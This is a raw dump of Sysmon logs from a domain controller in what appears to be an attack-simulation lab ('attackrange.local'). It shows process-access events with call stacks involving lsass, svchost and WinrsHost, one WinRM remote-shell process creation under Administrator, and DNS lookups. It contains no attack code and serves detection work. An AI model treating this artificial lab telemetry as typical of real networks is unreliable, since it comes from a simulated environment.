Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.356{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.044{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.012{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.840{59A5CD1D-8E15-6005-B802-00000000A201}4560f.f.f.f.f.b.1.0.b.2.3.2.0.e.8.9.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.824{59A5CD1D-8E15-6005-B802-00000000A201}45600.0.1.0.7.2.0.a.0.0.2.0.1.b.0.9.0.0.1.0.7.2.1.9.1.0.0.0.0.0.f.7.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.785{59A5CD1D-8E15-6005-B802-00000000A201}45602.0.0.10.in-addr.arpa.0type: 12 ip-10-0-0-2.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 